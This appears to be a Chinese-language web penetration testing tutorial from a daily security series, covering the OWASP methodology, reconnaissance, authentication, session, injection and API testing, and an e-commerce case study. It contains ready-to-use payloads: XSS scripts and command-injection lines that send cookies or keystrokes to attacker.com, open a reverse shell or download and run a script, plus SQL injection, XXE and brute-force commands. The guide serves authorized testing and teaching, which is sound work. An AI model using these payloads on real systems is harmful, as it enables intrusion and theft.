Day-194-Web 应用渗透测试

# Day 215: Web 应用渗透测试

> 渗透测试系列第 5 天 | 预计阅读时间：65 分钟 | 难度：★★★★★

---

## 清单 目录

1. [Web 应用渗透测试概述](#web 应用渗透测试概述)
2. [Web 应用测试方法论](#web 应用测试方法论)
3. [信息收集与侦察](#信息收集与侦察)
4. [认证测试](#认证测试)
5. [会话管理测试](#会话管理测试)
6. [输入验证测试](#输入验证测试)
7. [访问控制测试](#访问控制测试)
8. [业务逻辑测试](#业务逻辑测试)
9. [API 安全测试](#api 安全测试)
10. [前端安全测试](#前端安全测试)
11. [Web 渗透实战案例](#web 渗透实战案例)
12. [Web 渗透最佳实践](#web 渗透最佳实践)
13. [总结与思考](#总结与思考)
14. [参考资料](#参考资料)

---

## Web 应用渗透测试概述

### 什么是 Web 应用渗透测试

Web 应用渗透测试是对 Web 应用程序进行授权的安全测试，旨在发现可被攻击者利用的安全漏洞。

**Web 应用渗透测试的核心目标**：

```
┌─────────────────────────────────────────────────────────────┐
│              Web 应用渗透测试目标                           │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 发现安全漏洞                                            │
│     - OWASP Top 10 漏洞                                     │
│     - 业务逻辑漏洞                                          │
│     - 配置错误                                              │
│                                                             │
│  2. 评估业务影响                                            │
│     - 数据泄露风险                                          │
│     - 财务损失风险                                          │
│     - 声誉损害风险                                          │
│                                                             │
│  3. 验证防御措施                                            │
│     - WAF 有效性                                            │
│     - 输入验证                                              │
│     - 访问控制                                              │
│                                                             │
│  4. 提供修复建议                                            │
│     - 技术修复方案                                          │
│     - 流程改进建议                                          │
│     - 安全开发指导                                          │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### Web 应用测试范围

**测试层面**：

```
┌─────────────────────────────────────────────────────────────┐
│              Web 应用测试层面                               │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  表示层（前端）                                             │
│  ├── HTML/CSS/JavaScript                                    │
│  ├── DOM 操作                                               │
│  ├── 客户端验证                                             │
│  └── 浏览器存储                                             │
│                                                             │
│  业务逻辑层                                                 │
│  ├── 工作流程                                               │
│  ├── 权限控制                                               │
│  ├── 数据处理                                               │
│  └── 事务处理                                               │
│                                                             │
│  数据访问层                                                 │
│  ├── 数据库查询                                             │
│  ├── ORM 使用                                               │
│  ├── 缓存机制                                               │
│  └── 文件操作                                               │
│                                                             │
│  基础设施层                                                 │
│  ├── Web 服务器配置                                         │
│  ├── 中间件配置                                             │
│  ├── 网络配置                                               │
│  └── 安全设备                                               │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## Web 应用测试方法论

### OWASP 测试指南

**OWASP Testing Guide v4 分类**：

| 类别 | 测试项数量 | 主要内容 |
|------|------------|----------|
| **OTG-INFO** | 11 | 信息收集 |
| **OTG-CONFIG** | 6 | 配置管理 |
| **OTG-IDENT** | 5 | 身份管理 |
| **OTG-AUTHN** | 9 | 认证测试 |
| **OTG-AUTHZ** | 10 | 授权测试 |
| **OTG-SESS** | 8 | 会话管理 |
| **OTG-INPUT** | 14 | 输入验证 |
| **OTG-ERROR** | 4 | 错误处理 |
| **OTG-CRYPTO** | 4 | 加密测试 |
| **OTG-BUSLOGIC** | 6 | 业务逻辑 |
| **OTG-CLIENT** | 12 | 客户端测试 |

### 测试流程

```
┌─────────────────────────────────────────────────────────────┐
│              Web 应用测试流程                               │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 前期准备                                                │
│     ├── 获得授权                                            │
│     ├── 明确范围                                            │
│     └── 准备工具                                            │
│                                                             │
│  2. 信息收集                                                │
│     ├── 被动侦察                                            │
│     ├── 主动扫描                                            │
│     └── 应用映射                                            │
│                                                             │
│  3. 漏洞检测                                                │
│     ├── 自动化扫描                                          │
│     ├── 手动测试                                            │
│     └── 漏洞验证                                            │
│                                                             │
│  4. 漏洞利用                                                │
│     ├── 概念验证                                            │
│     ├── 影响评估                                            │
│     └── 数据收集                                            │
│                                                             │
│  5. 报告编写                                                │
│     ├── 技术报告                                            │
│     ├── 执行摘要                                            │
│     └── 修复建议                                            │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 信息收集与侦察

### 技术栈识别

**Wappalyzer 识别**：

```bash
# CLI 使用
$ wappalyzer https://target.com

# 输出示例
{
  "url": "https://target.com",
  "technologies": [
    {"name": "React", "version": "18.2.0"},
    {"name": "Node.js", "version": null},
    {"name": "Express", "version": null},
    {"name": "MongoDB", "version": null},
    {"name": "Nginx", "version": "1.18.0"}
  ]
}
```

**WhatWeb 识别**：

```bash
# 基础识别
$ whatweb https://target.com

# 详细识别
$ whatweb -v https://target.com

# 输出示例
https://target.com [200 OK]
Country[CHINA], IP[203.0.113.10], Title[Home Page],
Server[nginx/1.18.0], X-Powered-By[Express],
Framework[React], Script[application/json]
```

**自定义指纹识别**：

```python
#!/usr/bin/env python3
import requests
import re

def fingerprint(url):
    response = requests.get(url)
    headers = response.headers
    body = response.text
    
    tech = []
    
    # 检查 Server 头
    if 'nginx' in headers.get('Server', '').lower():
        tech.append('Nginx')
    if 'apache' in headers.get('Server', '').lower():
        tech.append('Apache')
    
    # 检查 X-Powered-By
    if 'Express' in headers.get('X-Powered-By', ''):
        tech.append('Express')
    if 'PHP' in headers.get('X-Powered-By', ''):
        tech.append('PHP')
    
    # 检查 HTML 内容
    if 'react' in body.lower():
        tech.append('React')
    if 'vue' in body.lower():
        tech.append('Vue.js')
    if 'angular' in body.lower():
        tech.append('Angular')
    
    # 检查 Cookie
    if 'JSESSIONID' in headers.get('Set-Cookie', ''):
        tech.append('Java')
    if 'ASP.NET' in headers.get('Set-Cookie', ''):
        tech.append('ASP.NET')
    
    return tech

print(fingerprint('https://target.com'))
```

### 目录枚举

**Gobuster 目录扫描**：

```bash
# 基础扫描
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# 多线程
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -t 50

# 指定扩展名
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

# 递归扫描
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -r

# 隐藏特定状态码
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -b 404

# 输出结果
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o results.txt
```

**常见敏感路径**：

```
# 管理后台
/admin
/administrator
/admin.php
/wp-admin
/manager
/console

# API 接口
/api
/api/v1
/api/v2
/v1
/v2
/graphql

# 配置文件
/config.php
/config.json
/.env
/.git/config
/web.config
/appsettings.json

# 备份文件
/backup
/backup.zip
/backup.sql
/database.sql
/dump.sql
/*.bak
/*.old
/*.backup

# 日志文件
/logs
/log
/access.log
/error.log
/debug.log

# 测试文件
/test
/testing
/dev
/staging
```

### 子域名枚举

**Subfinder 枚举**：

```bash
$ subfinder -d target.com -o subdomains.txt
$ cat subdomains.txt | httpx -silent -o active_subdomains.txt
```

**常见子域名模式**：

```
# 功能相关
www.target.com
mail.target.com
api.target.com
dev.target.com
test.target.com
staging.target.com
prod.target.com

# 部门相关
hr.target.com
finance.target.com
sales.target.com
it.target.com

# 地理位置
cn.target.com
us.target.com
eu.target.com
ap.target.com

# 收购公司
company-a.target.com
company-b.target.com
```

---

## 认证测试

### 弱密码测试

**Hydra 暴力破解**：

```bash
# HTTP 表单暴力破解
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  https://target.com/post http-post-form \
  "/login:username=^USER^&password=^PASS^:F=incorrect"

# HTTP GET 暴力破解
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  target.com http-get-form "/admin:username=^USER^&password=^PASS^:F=Login failed"

# 多用户暴力破解
$ hydra -L /usr/share/wordlists/users.txt -P /usr/share/wordlists/rockyou.txt \
  target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# 指定并发
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 \
  target.com http-post-form "/login:username=^USER^&password=^PASS^:Failed"
```

**常见默认凭证**：

```
# 通用默认凭证
admin:admin
admin:password
admin:123456
root:root
root:toor
user:user
test:test

# 厂商默认凭证
admin:admin123
administrator:password
support:support
guest:guest

# 应用默认凭证
wp-admin:admin (WordPress)
admin:magento (Magento)
cisco:cisco (Cisco)
```

### 认证绕过

**SQL 注入绕过**：

```sql
-- 基础绕过
admin'--
admin'/*
' OR '1'='1
" OR "1"="1

-- 注释绕过
admin' #
admin' --
admin'; --

-- 编码绕过
%27%20OR%20%271%27%3D%271
&#39; OR &#39;1&#39;=&#39;1
```

**逻辑绕过**：

```
# 参数篡改
POST /login
username=admin&password=wrong&authenticated=true

# 状态码绕过
# 修改响应状态码为 200
# 修改响应内容为成功消息

# Cookie 篡改
Set-Cookie: admin=true
Set-Cookie: role=admin
Set-Cookie: authenticated=1

# JWT 篡改
# 修改 alg 为 None
{
  "alg": "none",
  "typ": "JWT"
}
# 删除签名部分
```

### 多因素认证测试

**2FA 绕过技术**：

```
# 响应篡改
# 修改 2FA 验证响应
{"success": false} → {"success": true}

# 状态码绕过
# 修改 401/403 为 200

# 参数绕过
# 添加 bypass_2fa=true 参数

# 暴力破解 2FA 码
# 6 位数字码只有 100 万种可能

# 重放攻击
# 使用已验证的 2FA 码

# 逻辑缺陷
# 先访问需要 2FA 的页面，再登录
```

---

## 会话管理测试

### Cookie 分析

**Cookie 安全属性**：

```
┌─────────────────────────────────────────────────────────────┐
│              Cookie 安全属性                                │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  Secure                                                     │
│  ├── 含义：仅通过 HTTPS 传输                               │
│  ├── 测试：尝试 HTTP 访问是否发送 Cookie                   │
│  └── 风险：中间人攻击                                      │
│                                                             │
│  HttpOnly                                                   │
│  ├── 含义：JavaScript 无法访问                            │
│  ├── 测试：document.cookie 是否包含                       │
│  └── 风险：XSS 窃取 Cookie                                 │
│                                                             │
│  SameSite                                                   │
│  ├── 含义：限制跨站发送                                    │
│  ├── 值：Strict / Lax / None                              │
│  └── 风险：CSRF 攻击                                       │
│                                                             │
│  Path                                                       │
│  ├── 含义：Cookie 作用路径                                 │
│  └── 风险：路径遍历                                        │
│                                                             │
│  Domain                                                     │
│  ├── 含义：Cookie 作用域名                                 │
│  └── 风险：子域名劫持                                      │
│                                                             │
│  Expires / Max-Age                                          │
│  ├── 含义：Cookie 过期时间                                 │
│  └── 风险：会话固定                                        │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**Cookie 测试**：

```bash
# 检查 Cookie 属性
$ curl -I https://target.com/login

# 测试 HttpOnly
$ curl https://target.com -H "Cookie: session=test"

# 测试 Secure
$ curl http://target.com -H "Cookie: session=test"

# 测试 SameSite
# 需要浏览器测试
```

### 会话固定攻击

```
# 攻击流程：
1. 攻击者获取有效会话 ID
2. 诱导受害者使用该会话 ID 登录
3. 攻击者使用相同会话 ID 访问

# 测试方法：
1. 获取会话 ID
2. 使用他人会话 ID 登录
3. 检查会话是否更新

# 防御：
- 登录后生成新会话 ID
- 会话 ID 绑定 IP/User-Agent
```

### 会话劫持

```bash
# XSS 窃取会话
<script>
fetch('http://attacker.com/steal?c='+document.cookie);
</script>

# 会话预测
# 分析会话 ID 生成模式
# 尝试预测下一个会话 ID

# 会话重放
# 捕获有效会话
# 重放请求
```

---

## 输入验证测试

### SQL 注入测试

**检测注入**：

```sql
-- 基础测试
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--

-- 时间盲注
' AND SLEEP(5)--
" AND BENCHMARK(10000000,SHA1('test'))--

-- 报错注入
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--

-- 联合查询
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
```

**SQLMap 自动化**：

```bash
# 检测注入
$ sqlmap -u "https://target.com/page?id=1"

# 获取数据库
$ sqlmap -u "https://target.com/page?id=1" --dbs

# 获取表
$ sqlmap -u "https://target.com/page?id=1" -D database --tables

# 获取列
$ sqlmap -u "https://target.com/page?id=1" -D database -T users --columns

# 导出数据
$ sqlmap -u "https://target.com/page?id=1" -D database -T users --dump

# 获取 Shell
$ sqlmap -u "https://target.com/page?id=1" --os-shell

# 绕过 WAF
$ sqlmap -u "https://target.com/page?id=1" --tamper=space2comment
```

### XSS 测试

**XSS Payload 集合**：

```html

<script>alert('XSS')</script>

<scr<script>ipt>alert('XSS')</scr</script>ipt>
<svg/onload=alert('XSS')>
<body/onload=alert('XSS')>
<img src=x onerror=alert('XSS')>
<input onfocus=alert('XSS') autofocus>

<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log?key=' + e.key);
}
</script>

<script>
document.body.innerHTML = '<form action="http://attacker.com/steal">' +
    '<input name="username"><input name="password" type="password">' +
    '<button>Submit</button></form>';
</script>

# 测试位置：
- document.write()
- element.innerHTML
- element.outerHTML
- eval()
- setTimeout()
- setInterval()
- location.hash
- location.search
```

**XSS 测试工具**：

```bash
# XSStrike
$ xsstrike -u "https://target.com/search?q=test"

# Dalfox
$ dalfox url "https://target.com/search?q=test"

# Gxss (XSS 管道工具)
$ gxss -u "https://target.com" | dalfox pipe
```

### 命令注入测试

```bash
# 基础注入
; whoami
| whoami
&& whoami
|| whoami

# 换行注入
%0Awhoami
%0Dwhoami

# 反引号注入
`whoami`
$(whoami)

# 常见 Payload
; cat /etc/passwd
| nc attacker.com 4444 -e /bin/bash
&& wget http://attacker.com/shell.sh && bash shell.sh
; curl http://attacker.com/`whoami`

# 盲注
; sleep 5
| ping -c 5 127.0.0.1
```

### 文件包含测试

**LFI 测试**：

```
# 基础 LFI
http://target.com/page.php?file=../../../../etc/passwd
http://target.com/page.php?file=....//....//....//etc/passwd

# 使用过滤器
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=index.php
http://target.com/page.php?file=php://filter/read=string.rot13/resource=index.php

# 日志注入
http://target.com/page.php?file=/var/log/apache2/access.log
http://target.com/page.php?file=/var/log/auth.log

# /proc 自包含
http://target.com/page.php?file=/proc/self/environ
http://target.com/page.php?file=/proc/self/cmdline
```

**RFI 测试**：

```
# 基础 RFI
http://target.com/page.php?file=http://attacker.com/shell.txt?

# 需要 allow_url_include=On
http://target.com/page.php?file=http://attacker.com/shell.php?
```

### XXE 测试

```xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY bar SYSTEM "file:///etc/passwd" >
]>
<foo>&bar;</foo>

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY bar SYSTEM "file:///etc/passwd" >
]>
<request>
  <text>&bar;</text>
</request>

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY bar SYSTEM "http://192.168.1.1:8080/" >
]>

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY % bar SYSTEM "http://attacker.com/xxe.dtd" >
  %bar;
]>
```

---

## 访问控制测试

### 水平权限提升

```
# 测试方法：
1. 创建两个普通用户账户
2. 用户 A 访问自己的资源
3. 修改 ID 为用户 B 的资源 ID
4. 检查是否能访问用户 B 的资源

# 常见测试点：
- /user/profile?id=123 → 修改为 id=124
- /order/12345 → 修改为 12346
- /document/abc123 → 修改为 abc124
```

### 垂直权限提升

```
# 测试方法：
1. 以普通用户身份登录
2. 尝试访问管理员功能
3. 修改参数提升权限

# 常见测试点：
- /admin → 直接访问
- /api/admin/users → 访问管理员 API
- role=user → 修改为 role=admin
- is_admin=false → 修改为 is_admin=true
```

### IDOR 测试

```
# 测试步骤：
1. 识别资源标识符
2. 修改标识符访问他人资源
3. 检查访问控制

# 常见位置：
- URL 路径：/user/123/profile
- 查询参数：?user_id=123
- POST 数据：{"user_id": 123}
- Cookie: user_id=123

# 测试工具：
- Burp Suite Authz 插件
- IDOR 自动化脚本
```

---

## 业务逻辑测试

### 常见业务逻辑漏洞

**价格篡改**：

```
# 测试方法：
1. 添加商品到购物车
2. 拦截请求
3. 修改价格参数
4. 完成支付

# 常见参数：
- price=100 → price=1
- amount=1 → amount=-1
- discount=10 → discount=100
- total=100 → total=1
```

**竞争条件**：

```
# 测试场景：
1. 账户余额：100 元
2. 同时发起两次转账请求
3. 检查是否成功转出 200 元

# 测试工具：
- Burp Suite Turbo Intruder
- 自定义并发脚本
```

**流程绕过**：

```
# 测试方法：
1. 识别业务流程步骤
2. 尝试跳过中间步骤
3. 直接访问最终步骤

# 常见场景：
- 购物车 → 直接访问支付页面
- 注册 → 跳过邮箱验证
- 申请 → 跳过审批流程
```

---

## API 安全测试

### REST API 测试

**信息收集**：

```bash
# 发现 API 端点
$ gobuster dir -u https://target.com -w api-wordlist.txt

# 常见 API 路径
/api
/api/v1
/api/v2
/v1
/v2
/graphql
/swagger
/api-docs
/openapi.json
```

**认证测试**：

```bash
# 测试无认证访问
$ curl https://target.com/api/users

# 测试弱认证
$ curl -H "Authorization: Basic YWRtaW46YWRtaW4=" \
  https://target.com/api/users

# 测试 JWT
$ curl -H "Authorization: Bearer <token>" \
  https://target.com/api/users
```

**参数测试**：

```bash
# 测试批量分配
$ curl -X POST https://target.com/api/users \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","role":"admin"}'

# 测试注入
$ curl "https://target.com/api/users?id=1%27%20OR%20%271%27=%271"

# 测试 SSRF
$ curl -X POST https://target.com/api/fetch \
  -d '{"url":"http://169.254.169.254/latest/meta-data/"}'
```

### GraphQL 测试

**内省查询**：

```graphql
# 检查内省是否启用
{
  __schema {
    types {
      name
      fields {
        name
      }
    }
  }
}

# 获取所有查询
{
  __type(name: "Query") {
    fields {
      name
      args {
        name
        type {
          name
        }
      }
      type {
        name
      }
    }
  }
}

# 获取所有变异
{
  __type(name: "Mutation") {
    fields {
      name
    }
  }
}
```

**GraphQL 注入**：

```graphql
# 深度查询攻击
{
  a: user(id: 1) {
    friends {
      friends {
        friends {
          friends {
            name
          }
        }
      }
    }
  }
}

# 别名攻击
{
  u1: user(id: 1) { name }
  u2: user(id: 2) { name }
  u3: user(id: 3) { name }
  # ... 重复 1000 次
}

# 批量查询
[
  {"query": "{ user(id: 1) { name } }"},
  {"query": "{ user(id: 2) { name } }"},
  # ... 重复 1000 次
]
```

---

## 前端安全测试

### DOM XSS 测试

**测试位置**：

```javascript
// 危险源
- location.hash
- location.search
- document.referrer
- window.name
- postMessage

// 危险汇
- document.write()
- element.innerHTML
- element.outerHTML
- eval()
- setTimeout(string)
- setInterval(string)
- Function(string)
```

**测试工具**：

```bash
# DOM Invader (Burp 插件)
# 自动检测 DOM XSS

# Dalfox
$ dalfox url "https://target.com" --dom

# Gxss
$ gxss -u "https://target.com" | dalfox pipe
```

### CSP 绕过测试

```
# 检查 CSP 头
$ curl -I https://target.com
Content-Security-Policy: default-src 'self'

# 测试 CSP 绕过
- 寻找宽松指令
- 测试 unsafe-inline
- 测试 unsafe-eval
- 测试通配符 *.attacker.com

# 报告模式
Content-Security-Policy-Report-Only: ...
```

### Clickjacking 测试

```html

<iframe src="https://target.com/action" width="100%" height="100%"></iframe>

# 检查 X-Frame-Options
$ curl -I https://target.com
X-Frame-Options: DENY

# 检查 CSP frame-ancestors
Content-Security-Policy: frame-ancestors 'none'
```

---

## Web 渗透实战案例

### 案例背景

**目标**：某电商平台
**测试范围**：
- 主站：https://shop.example.com
- API: https://api.example.com
- 管理后台：https://admin.example.com

### 测试过程

#### 第 1 阶段：信息收集

```bash
# 技术栈识别
$ whatweb https://shop.example.com
React, Node.js, Express, MongoDB, Nginx

# 子域名枚举
$ subfinder -d example.com
shop.example.com
api.example.com
admin.example.com
dev.example.com
staging.example.com

# 目录扫描
$ gobuster dir -u https://shop.example.com -w common.txt
/admin - Status: 301
/api - Status: 200
/backup - Status: 403
```

#### 第 2 阶段：漏洞发现

**SQL 注入**：

```bash
# 发现注入点
$ sqlmap -u "https://shop.example.com/search?q=test"

[INFO] GET parameter 'q' is vulnerable to SQL injection

# 获取数据库
$ sqlmap -u "https://shop.example.com/search?q=test" --dbs

可用数据库：
- shop_db
- users_db
```

**XSS 漏洞**：

```html
# 发现存储型 XSS
位置：商品评论
Payload: <script>alert('XSS')</script>
影响：所有查看该评论的用户
```

**IDOR 漏洞**：

```
# 发现订单 IDOR
请求：GET /api/order/12345
修改：GET /api/order/12346
结果：成功访问他人订单
```

#### 第 3 阶段：漏洞利用

**SQL 注入利用**：

```bash
# 获取管理员凭证
$ sqlmap -u "https://shop.example.com/search?q=test" \
  -D shop_db -T admins --dump

admin:P@ssw0rd123!
```

**业务逻辑漏洞**：

```
# 价格篡改
1. 添加商品到购物车
2. 拦截请求
3. 修改 price=999 → price=1
4. 完成支付
5. 成功以 1 元购买 999 元商品
```

#### 第 4 阶段：权限提升

```
# 从 SQL 注入到服务器权限
1. 获取数据库写入权限
2. 写入 Webshell
3. 获取 Web 服务器权限
4. 提权到系统权限
```

### 漏洞汇总

| 漏洞 | 风险等级 | CVSS | 修复状态 |
|------|----------|------|----------|
| SQL 注入 | 严重 | 9.8 | 待修复 |
| 存储型 XSS | 高危 | 7.5 | 待修复 |
| 订单 IDOR | 高危 | 8.1 | 待修复 |
| 价格篡改 | 严重 | 9.1 | 待修复 |
| 弱密码策略 | 中危 | 5.3 | 待修复 |
| 缺少 CSP | 低危 | 3.1 | 待修复 |

---

## Web 渗透最佳实践

### 测试清单

```
┌─────────────────────────────────────────────────────────────┐
│              Web 应用测试清单                               │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  信息收集                                                   │
│  □ 技术栈识别                                               │
│  □ 子域名枚举                                               │
│  □ 目录扫描                                                 │
│  □ 敏感文件发现                                             │
│                                                             │
│  认证测试                                                   │
│  □ 弱密码测试                                               │
│  □ 认证绕过                                                 │
│  □ 多因素认证测试                                           │
│  □ 密码重置测试                                             │
│                                                             │
│  会话测试                                                   │
│  □ Cookie 属性检查                                          │
│  □ 会话固定测试                                             │
│  □ 会话劫持测试                                             │
│  □ 会话超时测试                                             │
│                                                             │
│  输入验证                                                   │
│  □ SQL 注入测试                                             │
│  □ XSS 测试                                                 │
│  □ 命令注入测试                                             │
│  □ 文件包含测试                                             │
│  □ XXE 测试                                                 │
│  □ SSRF 测试                                                │
│                                                             │
│  访问控制                                                   │
│  □ 水平权限提升测试                                         │
│  □ 垂直权限提升测试                                         │
│  □ IDOR 测试                                                │
│                                                             │
│  业务逻辑                                                   │
│  □ 价格篡改测试                                             │
│  □ 竞争条件测试                                             │
│  □ 流程绕过测试                                             │
│                                                             │
│  API 测试                                                   │
│  □ 认证测试                                                 │
│  □ 参数测试                                                 │
│  □ 速率限制测试                                             │
│  □ GraphQL 测试（如适用）                                   │
│                                                             │
│  前端测试                                                   │
│  □ DOM XSS 测试                                             │
│  □ CSP 测试                                                 │
│  □ Clickjacking 测试                                        │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### 工具组合

**推荐工具组合**：

```
┌─────────────────────────────────────────────────────────────┐
│              Web 渗透工具组合                               │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  基础组合：                                                 │
│  ├── Burp Suite Community（代理、扫描）                    │
│  ├── OWASP ZAP（扫描）                                     │
│  ├── SQLMap（SQL 注入）                                    │
│  └── Gobuster（目录扫描）                                  │
│                                                             │
│  专业组合：                                                 │
│  ├── Burp Suite Professional（完整功能）                   │
│  ├── SQLMap（SQL 注入）                                    │
│  ├── Nuclei（漏洞扫描）                                    │
│  ├── XSStrike（XSS 测试）                                  │
│  └── Dalfox（XSS 测试）                                    │
│                                                             │
│  辅助工具：                                                 │
│  ├── Wappalyzer（技术栈识别）                              │
│  ├── Subfinder（子域名枚举）                              │
│  ├── httpx（HTTP 探测）                                    │
│  └── nuclei（模板扫描）                                    │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 总结与思考

### 核心要点回顾

1. **Web 应用渗透测试需要系统性方法**，遵循 OWASP 测试指南

2. **信息收集是基础**，充分了解目标才能发现更多漏洞

3. **自动化 + 手动结合**，自动化工具发现，手动验证利用

4. **业务逻辑漏洞**往往比技术漏洞更严重

5. **报告质量决定价值**，清晰的报告帮助客户真正提升安全

### 深入思考

**问题 1：Web 安全测试的未来趋势？**

我的观点：
- API 安全越来越重要
- GraphQL 安全测试需求增加
- 云原生应用安全测试
- 自动化测试比例提升
- 人工测试聚焦业务逻辑

**问题 2：如何平衡测试深度和业务影响？**

我建议：
- 生产环境使用安全测试方法
- 避开业务高峰期
- 限制测试速率
- 准备应急方案
- 及时沟通

**问题 3：Web 安全测试的频率？**

我推荐：
- **新应用上线前**：必须测试
- **重大变更后**：立即测试
- **定期测试**：每季度 1 次
- **持续监控**：自动化扫描

### 实战建议

**给新手的建议**：

```
1. 掌握基础工具
   - Burp Suite（必须精通）
   - SQLMap（SQL 注入）
   - OWASP ZAP（免费替代）

2. 理解 OWASP Top 10
   - 每种漏洞原理
   - 检测方法
   - 修复方案

3. 建立测试方法论
   - 遵循 OWASP 测试指南
   - 创建检查清单
   - 记录测试过程

4. 持续学习
   - 关注新漏洞
   - 学习新技术
   - 参与安全社区
```

**给企业的建议**：

```
1. 安全开发生命周期
   - 需求阶段考虑安全
   - 开发阶段代码审计
   - 测试阶段渗透测试
   - 上线前安全检查

2. 定期安全测试
   - 每年至少 1 次渗透测试
   - 持续自动化扫描
   - 漏洞赏金计划

3. 安全培训
   - 开发人员安全培训
   - 测试人员安全培训
   - 安全意识培训

4. 应急响应
   - 建立应急流程
   - 准备回滚方案
   - 定期演练
```

---

## 参考资料

### 学习资源

| 资源 | 类型 | 链接 |
|------|------|------|
| **OWASP Top 10** | 标准 | https://owasp.org/www-project-top-ten |
| **OWASP 测试指南** | 指南 | https://owasp.org/www-project-web-security-testing-guide |
| **OWASP Cheat Sheet** | 速查表 | https://cheatsheetseries.owasp.org |
| **PortSwigger Academy** | 培训 | https://portswigger.net/web-security |
| **PentesterLab** | 练习 | https://pentesterlab.com |

### 工具资源

| 工具 | 官网 | 用途 |
|------|------|------|
| **Burp Suite** | https://portswigger.net/burp | Web 测试平台 |
| **OWASP ZAP** | https://www.zaproxy.org | Web 扫描器 |
| **SQLMap** | https://sqlmap.org | SQL 注入 |
| **Nuclei** | https://nuclei.sh | 模板扫描 |
| **Gobuster** | GitHub | 目录扫描 |
| **Subfinder** | GitHub | 子域名枚举 |

### 实践平台

| 平台 | 类型 | 链接 |
|------|------|------|
| **PortSwigger Web Security Academy** | 在线练习 | https://portswigger.net/web-security |
| **OWASP Juice Shop** | 漏洞应用 | https://owasp.org/www-project-juice-shop |
| **DVWA** | 漏洞应用 | https://dvwa.co.uk |
| **HackTheBox** | 在线实验室 | https://hackthebox.com |
| **TryHackMe** | 在线学习 | https://tryhackme.com |

### 书籍推荐

| 书名 | 作者 | 难度 |
|------|------|------|
| 《The Web Application Hacker's Handbook》 | Dafydd Stuttard | 进阶 |
| 《Web Application Security》 | Andrew Hoffman | 入门 |
| 《Real-World Bug Bounty》 | Peter Yaworski | 实战 |
| 《Bug Bounty Bootcamp》 | Vickie Li | 入门 |

---

*365 天信息安全技术系列 | Day 215 | Web 应用渗透测试 | 字数：约 23,000 字*